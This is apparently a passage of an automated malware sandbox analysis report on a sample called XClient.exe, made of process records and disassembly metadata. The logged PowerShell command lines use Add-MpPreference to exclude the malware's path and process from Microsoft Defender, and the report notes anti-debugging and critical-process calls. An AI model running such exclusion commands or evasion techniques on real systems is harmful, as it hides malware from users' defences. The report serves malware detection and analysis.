                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:8
                                                                        Start time:15:22:16
                                                                        Start date:26/07/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
                                                                        Imagebase:0x7ff6e3d50000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:9
                                                                        Start time:15:22:16
                                                                        Start date:26/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff66e660000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:10
                                                                        Start time:15:22:30
                                                                        Start date:26/07/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                                                                        Imagebase:0x7ff6e3d50000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:11
                                                                        Start time:15:22:30
                                                                        Start date:26/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff66e660000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:22.2%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:50%
                                                                          Total number of Nodes:6
                                                                          Total number of Limit Nodes:0

                                                                          Executed Functions

                                                                          Function 00007FFD346910FA Relevance: 3.2, Strings: 2, Instructions: 727COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 7ffd346910fa-7ffd34691141 3 7ffd34691176-7ffd3469117a 0->3 4 7ffd34691143-7ffd34691149 0->4 5 7ffd3469117e-7ffd346911ae 3->5 4->5 6 7ffd3469114b-7ffd34691175 4->6 11 7ffd346911b5-7ffd346911b6 5->11 12 7ffd346911b0 5->12 6->3 13 7ffd346911b8 11->13 14 7ffd346911bc-7ffd346911be 11->14 12->11 13->14 15 7ffd346911c0 14->15 16 7ffd346911c3-7ffd346911c6 14->16 15->16 17 7ffd346911c8 16->17 18 7ffd346911ca-7ffd346911ce 16->18 17->18 19 7ffd346911d0 18->19 20 7ffd346911d1-7ffd34691210 18->20 19->20 23 7ffd34691216-7ffd3469138b call 7ffd34690638 * 10 call 7ffd34690a30 20->23 24 7ffd3469183c-7ffd34691883 20->24 74 7ffd34691395-7ffd3469140c call 7ffd346904c0 call 7ffd346904b8 call 7ffd34690348 call 7ffd34690358 23->74 75 7ffd3469138d-7ffd34691394 23->75 90 7ffd3469140e-7ffd34691418 74->90 91 7ffd3469141f-7ffd3469142f 74->91 75->74 90->91 94 7ffd34691457-7ffd34691477 91->94 95 7ffd34691431-7ffd34691450 call 7ffd34690348 91->95 101 7ffd34691488-7ffd3469156a 94->101 102 7ffd34691479-7ffd34691483 call 7ffd34690368 94->102 95->94 116 7ffd346915b8-7ffd346915eb 101->116 117 7ffd3469156c-7ffd3469159f 101->117 102->101 127 7ffd346915ed-7ffd3469160e 116->127 128 7ffd34691610-7ffd34691640 116->128 117->116 124 7ffd346915a1-7ffd346915ae 117->124 124->116 129 7ffd346915b0-7ffd346915b6 124->129 131 7ffd34691648-7ffd3469167f 127->131 128->131 129->116 137 7ffd34691681-7ffd346916a2 131->137 138 7ffd346916a4-7ffd346916d4 131->138 140 7ffd346916dc-7ffd34691765 call 7ffd34690378 call 7ffd346909d0 call 7ffd34691018 137->140 138->140 152 7ffd34691767 call 7ffd346907d0 140->152 153 7ffd3469176c call 7ffd346904b0 140->153 152->153 156 7ffd34691771-7ffd3469180a 153->156
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3399090700.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd34690000_VJV2AjJ7Na.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 3L_^$SAL_^
                                                                          • API String ID: 0-2916792836
                                                                          • Opcode ID: ef7a7c78c27219ccab637137c45e3e3d3801e1a24c4c8120efe9a128c650a04e
                                                                          • Instruction ID: 3033a04943e8291265b939e3a6c2a6d5ac5da4dc74210cfa61f1c61b28721391
                                                                          • Opcode Fuzzy Hash: ef7a7c78c27219ccab637137c45e3e3d3801e1a24c4c8120efe9a128c650a04e
                                                                          • Instruction Fuzzy Hash: D5220461B1DB1A0BE794BBBC94A92FD77D1FF99311F40057EE14EC3292DE68A8018781
                                                                          Function 00007FFD346972A1 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 173 7ffd346972a1-7ffd346972ba 174 7ffd346972bc-7ffd346972ef 173->174 175 7ffd346972f0-7ffd3469735d CheckRemoteDebuggerPresent 173->175 174->175 179 7ffd34697365-7ffd346973a8 175->179 180 7ffd3469735f 175->180 180->179
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3399090700.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd34690000_VJV2AjJ7Na.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0
                                                                          • Opcode ID: 0232821da32e4c53681d525db8573f907571535c3fde307876a93e6593ff193c
                                                                          • Instruction ID: dd048c9357db960a979d9b7ec59b2897cab8c51bd2cf1076e3f58f45d0c17886
                                                                          • Opcode Fuzzy Hash: 0232821da32e4c53681d525db8573f907571535c3fde307876a93e6593ff193c
                                                                          • Instruction Fuzzy Hash: CE31023190875C8FCB58DF98C88A7E97BE0FF65311F05426AD489D7292DB34A846CB91
                                                                          Function 00007FFD34695CF6 Relevance: .5, Instructions: 468COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3399090700.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd34690000_VJV2AjJ7Na.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d9e8bf1924eadd95ba316f8aa4087b299f8d2850bc188d565f82174caba11934
                                                                          • Instruction ID: ecdbc2229e01738d47c44c3363a4320b90a771859695dea2d53bb49a9ba80a92
                                                                          • Opcode Fuzzy Hash: d9e8bf1924eadd95ba316f8aa4087b299f8d2850bc188d565f82174caba11934
                                                                          • Instruction Fuzzy Hash: 34F1B63160CA4E8FEBA8DF28C8657E937E1FF55310F04426EE84DC7291DB7999458B81
                                                                          Function 00007FFD34696AA2 Relevance: .5, Instructions: 454COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3399090700.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd34690000_VJV2AjJ7Na.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ace6e2820f8f7a85488dee7a0c35a073dd08f7d633fa06e89bf7e464b1b546b2
                                                                          • Instruction ID: a7b3a5215c035da3436316db88edeeb904479f68d0a6db6e97b89593d6151050
                                                                          • Opcode Fuzzy Hash: ace6e2820f8f7a85488dee7a0c35a073dd08f7d633fa06e89bf7e464b1b546b2
                                                                          • Instruction Fuzzy Hash: D6E1A530608A4E8FEBA8DF28C8657E977E1FF55310F14426EE84DC7295DF7898458B81
                                                                          Function 00007FFD34691BB1 Relevance: .4, Instructions: 391COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3399090700.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd34690000_VJV2AjJ7Na.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 83ba8d78b44b40854248828f5a9b6f46b323e98bdf35722a6197682c93c163a7
                                                                          • Instruction ID: 58914d545728586680b059f86085170e732360934eaaa734cfddc9e4e89a0a2e
                                                                          • Opcode Fuzzy Hash: 83ba8d78b44b40854248828f5a9b6f46b323e98bdf35722a6197682c93c163a7
                                                                          • Instruction Fuzzy Hash: 22C1C061B1CA594FFB98EF6C84B52F977D2EF9A304F14417AD04ED32D2DE68A8029341
                                                                          Function 00007FFD34698D9D Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 166 7ffd34698d9d-7ffd34698e80 RtlSetProcessIsCritical 170 7ffd34698e88-7ffd34698ebd 166->170 171 7ffd34698e82 166->171 171->170
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3399090700.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd34690000_VJV2AjJ7Na.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalProcess
                                                                          • String ID:
                                                                          • API String ID: 2695349919-0
                                                                          • Opcode ID: 57432d8bff2fade5ddf6da13533e7ee79e75570a6329053a24e35c350b11b98b
                                                                          • Instruction ID: 5eb6ca2d877ebc9d17c01d3b16a255048816983b38d7aad112568613b1214b1e
                                                                          • Opcode Fuzzy Hash: 57432d8bff2fade5ddf6da13533e7ee79e75570a6329053a24e35c350b11b98b
                                                                          • Instruction Fuzzy Hash: 0841043190C6588FDB29DFA8C855AE97BF0FF56311F04416ED08AD3692CB746846CB91
                                                                          Function 00007FFD346985FA Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 182 7ffd346985fa-7ffd34698e1a 186 7ffd34698e22-7ffd34698e80 RtlSetProcessIsCritical 182->186 187 7ffd34698e88-7ffd34698ebd 186->187 188 7ffd34698e82 186->188 188->187
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3399090700.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd34690000_VJV2AjJ7Na.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalProcess
                                                                          • String ID:
                                                                          • API String ID: 2695349919-0
                                                                          • Opcode ID: f6cde66d0e3ae73122444bd41103692458bc5992e210c69288790ef0c722d418
                                                                          • Instruction ID: e64ffb9e1854c4d76c7a5015672ba16116f722837ad5c28e8c8a47f2829e71bb
                                                                          • Opcode Fuzzy Hash: f6cde66d0e3ae73122444bd41103692458bc5992e210c69288790ef0c722d418
                                                                          • Instruction Fuzzy Hash: 2C31F63190CA588FDB29DF98D8557E97BE0FF65311F14012ED08AD3682CB746846CB91

                                                                          Non-executed Functions

                                                                          Function 00007FFD3469E0BC Relevance: .2, Instructions: 229COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3399090700.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd34690000_VJV2AjJ7Na.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3eb287fbb3db074677ae68b9d197de9b8c3baf1a2bd5ebde02773aa6eb059bfd
                                                                          • Instruction ID: 5bddd4ea616c1d07892446226de6e14204ece2676cb488b3703eb79a0a0a1894
                                                                          • Opcode Fuzzy Hash: 3eb287fbb3db074677ae68b9d197de9b8c3baf1a2bd5ebde02773aa6eb059bfd
                                                                          • Instruction Fuzzy Hash: 7B71C72064F7C55FE7479738D8A8AE97F91AF83325F0D41FAE088CA4A3DAD94506C742
                                                                          Function 00007FFD346925D3 Relevance: .2, Instructions: 213COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3399090700.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd34690000_VJV2AjJ7Na.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 198dbc58072b2d16336fbcfd3ef618a8e77ac1ca1fca21d53114327b364b6ea5
                                                                          • Instruction ID: c7e6664d3485ebae105958ef7b5c20c9872b3898f26f9739e90c77737c661038
                                                                          • Opcode Fuzzy Hash: 198dbc58072b2d16336fbcfd3ef618a8e77ac1ca1fca21d53114327b364b6ea5
                                                                          • Instruction Fuzzy Hash: 37615F57A0E7D21EE6639A6C68F50E63F90DF6326970904F7C2D4CF0A3DD4C244AA262
                                                                          Function 00007FFD346926D3 Relevance: .2, Instructions: 150COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3399090700.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd34690000_VJV2AjJ7Na.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 69c44040f3c249a8dc9bd7c9628830e4b43356d89a8544118730a2cb6be61e49
                                                                          • Instruction ID: 737ce68007fff38575acbc6b3d899ac5ec507e0469923a42ceb7f932a19fb06e
                                                                          • Opcode Fuzzy Hash: 69c44040f3c249a8dc9bd7c9628830e4b43356d89a8544118730a2cb6be61e49
                                                                          • Instruction Fuzzy Hash: 0F419767F0E7D21BE6A2CA6C58F50E53F90EF2326471909F7C285CF097DD5C144A6212

                                                                          Executed Functions

                                                                          Function 00007FFD3469644D Relevance: .7, Instructions: 725COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2207655880.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34690000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b95aefd2564b81a3f20d41f7683230d7047d3d85023c4d82ee17c359881a8c22
                                                                          • Instruction ID: d4466a3980e7e23a2ef373d24f474f1b5736d461816ad27f5d63bfc5f5eb4bdf
                                                                          • Opcode Fuzzy Hash: b95aefd2564b81a3f20d41f7683230d7047d3d85023c4d82ee17c359881a8c22
                                                                          • Instruction Fuzzy Hash: 42D17D31A08A5D8FDF94DF58C4A5AE97BF1FF69300F14416AD40DD72A6CA78E881CB81
                                                                          Function 00007FFD34764033 Relevance: .4, Instructions: 391COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2208192477.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b1a5f38aeeafed6857b70a882df92c7a54cc79488fcc8e7272dac1e821aa44b0
                                                                          • Instruction ID: 2dae4e457afed52d54b1cd34f451af58044b2b3c75c92fa65e49377748ab1711
                                                                          • Opcode Fuzzy Hash: b1a5f38aeeafed6857b70a882df92c7a54cc79488fcc8e7272dac1e821aa44b0
                                                                          • Instruction Fuzzy Hash: C1B1E662A0DB868FE76A972858A51B43FE2DF97220B1901FBD18DC7193DD1CBC06C395
                                                                          Function 00007FFD3476432B Relevance: .3, Instructions: 314COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2208192477.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c7652e2cfbf3d5ad321a2059442a315eb444280a0fa3efaab0578f41c814b340
                                                                          • Instruction ID: 9f2ef65c3ae9128e2c6ddb240492499e636b7207f2e71a73c0c887386edd69f7
                                                                          • Opcode Fuzzy Hash: c7652e2cfbf3d5ad321a2059442a315eb444280a0fa3efaab0578f41c814b340
                                                                          • Instruction Fuzzy Hash: 51912772A0E7898FE7A6962C58A51B43FE2EF57220B0901FBD18DD7193D91CBC06C385
                                                                          Function 00007FFD3469A0D3 Relevance: .2, Instructions: 250COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2207655880.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34690000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cdb697f3aa4058169d9d496deed9d37143618663b2e8ad425db83c70523ad083
                                                                          • Instruction ID: 883484e3733a39b446eb0a7bdfb1516fe929d1d47531ed32bff53b5aed451ce1
                                                                          • Opcode Fuzzy Hash: cdb697f3aa4058169d9d496deed9d37143618663b2e8ad425db83c70523ad083
                                                                          • Instruction Fuzzy Hash: 2A11733691E7C44FDB078F389C690A47FB0EF67210B0901DBD588CB0A3D559990CC792
                                                                          Function 00007FFD34699758 Relevance: .1, Instructions: 132COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2207655880.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34690000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3540b3e76dc646f08bfd9159f030b84f6d0fabba64333cf5883cd7d3dad7553e
                                                                          • Instruction ID: 00dc66ffafd126d1c20c55bf409d243462001f38a646300fd0dfffe5c32588ff
                                                                          • Opcode Fuzzy Hash: 3540b3e76dc646f08bfd9159f030b84f6d0fabba64333cf5883cd7d3dad7553e
                                                                          • Instruction Fuzzy Hash: CF310971A1CB484FDB589F5C984A6E9BBE0FBA9310F10412FE449D3252DA74A856CBC2
                                                                          Function 00007FFD3457E380 Relevance: .1, Instructions: 125COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2207187811.00007FFD3457D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3457D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd3457d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: efca0f814e99be908cbbae1d5d685a3baa7d019f3838c32928f4ce446e7ab47e
                                                                          • Instruction ID: 96e4ec7052ed5098bc6fbe1e95b213facea8dd9ef8099d69ea51ec55846159b4
                                                                          • Opcode Fuzzy Hash: efca0f814e99be908cbbae1d5d685a3baa7d019f3838c32928f4ce446e7ab47e
                                                                          • Instruction Fuzzy Hash: 83411F7090DBC44FE7568B289C959523FB0EF53324B1546EFE088CB1A3D629F806C792
                                                                          Function 00007FFD3469A62C Relevance: .1, Instructions: 102COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2207655880.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34690000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: acf1f234d98055371b41587bd52c4d0034290222847fbafaf7cf484f4fe9ca1d
                                                                          • Instruction ID: 41cb41eb3a1fb66b91709db90177764865366dcd05e63cf0cd035d1b5c09b8c3
                                                                          • Opcode Fuzzy Hash: acf1f234d98055371b41587bd52c4d0034290222847fbafaf7cf484f4fe9ca1d
                                                                          • Instruction Fuzzy Hash: 7C212831A0CB4C4FEB59DFAC9C4A7E97BE0EBA6320F04416BD048C3152DA74944ACB92
                                                                          Function 00007FFD347640BF Relevance: .1, Instructions: 98COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2208192477.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a03d26c234e5c58c9d04914ebc0e746779c004212655f0cb569a5bd4893b07b4
                                                                          • Instruction ID: 2b0f0ac5cdab89940720c5a629b4a70d08e7e1633aa19457da30d3a2b2fb882b
                                                                          • Opcode Fuzzy Hash: a03d26c234e5c58c9d04914ebc0e746779c004212655f0cb569a5bd4893b07b4
                                                                          • Instruction Fuzzy Hash: 8F21E5A3B0DA9A8FE7A9DA1844E117436D3EF66230B5900BAD24DC71D3DD2CFC449789
                                                                          Function 00007FFD347643BC Relevance: .1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2208192477.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ec6d0ee8ade50bdc42e56a653750534b7eca64f3cfe71accbde02017433241b5
                                                                          • Instruction ID: 7555ffbf09d53f6cea3d709029b2f5819f95266b9b675e315971013409f9b6e6
                                                                          • Opcode Fuzzy Hash: ec6d0ee8ade50bdc42e56a653750534b7eca64f3cfe71accbde02017433241b5
                                                                          • Instruction Fuzzy Hash: 3F1106B2B0E6458FE7A5DB1C84E55B87BD2EF46234B4900BAD55DC7193D92CBC0093C5
                                                                          Function 00007FFD3476681E Relevance: .1, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2208192477.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b7e5e350d3e22e11845b35c690b5903b509e6ebdeaa47ad80edd839770eec696
                                                                          • Instruction ID: 62a3430b57f212d4faddc306af7574872ab544bef723ade60231afbe6f659522
                                                                          • Opcode Fuzzy Hash: b7e5e350d3e22e11845b35c690b5903b509e6ebdeaa47ad80edd839770eec696
                                                                          • Instruction Fuzzy Hash: B7113A72F0D6898FEB65DAA884E556877D2EF16324F5440BFC14CD7193D92CA805C391
                                                                          Function 00007FFD346933B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2207655880.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34690000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                          • Instruction ID: 66e339b9c219ae05c0f4a9cc314582de7c043b64f66fa0b2c63f0f34819a108e
                                                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                          • Instruction Fuzzy Hash: 5F01677125CB0C4FDB44EF0CE451AA5B7E0FB99364F10056DE58AC3651DA36E892CB45

                                                                          Non-executed Functions

                                                                          Function 00007FFD34698BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2207655880.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34690000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: K_^4$K_^7$K_^F$K_^J
                                                                          • API String ID: 0-377281160
                                                                          • Opcode ID: 4bcb7626cc64b94c55d6df8f3314fc61f7497ef9aa3022dd500b8fbce610da28
                                                                          • Instruction ID: 77c35d3eff2749c01ff4ea9d51caeab11f86116209175ed8640e8a5eb4cd92fa
                                                                          • Opcode Fuzzy Hash: 4bcb7626cc64b94c55d6df8f3314fc61f7497ef9aa3022dd500b8fbce610da28
                                                                          • Instruction Fuzzy Hash: EC2104B770C6265ED6117BFCA8545EA3BA4CFA827934502B2D198DB013ED1460868AC0

                                                                          Executed Functions

                                                                          Function 00007FFD347639D1 Relevance: 4.1, Strings: 2, Instructions: 1570COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2305129420.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ffd34760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: P7u$$I_H
                                                                          • API String ID: 0-3307117715
                                                                          • Opcode ID: dc9b3136f37c0c6e104f84469b2a5d8ad47de81dd515ed6a21435f7be4dac4e7
                                                                          • Instruction ID: 26dd02b4e2b16391371ebe024174cb8c01de531a8429e7568fff30335b197fb9
                                                                          • Opcode Fuzzy Hash: dc9b3136f37c0c6e104f84469b2a5d8ad47de81dd515ed6a21435f7be4dac4e7
                                                                          • Instruction Fuzzy Hash: 73A2F562A0DBC54FE7A6972858A51B47BE2EF97220B0901FFD18DC7193DD1CAC06D391
                                                                          Function 00007FFD347667FA Relevance: .1, Instructions: 126COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2305129420.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ffd34760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ff2e7ab668352119eb7f475f04483b3a84d4c25975c8012dabc4511c3410aa40
                                                                          • Instruction ID: 7245746dd28a548ab9571d7f59573319ece133361a18e64d17c4d480a1b5a1b3
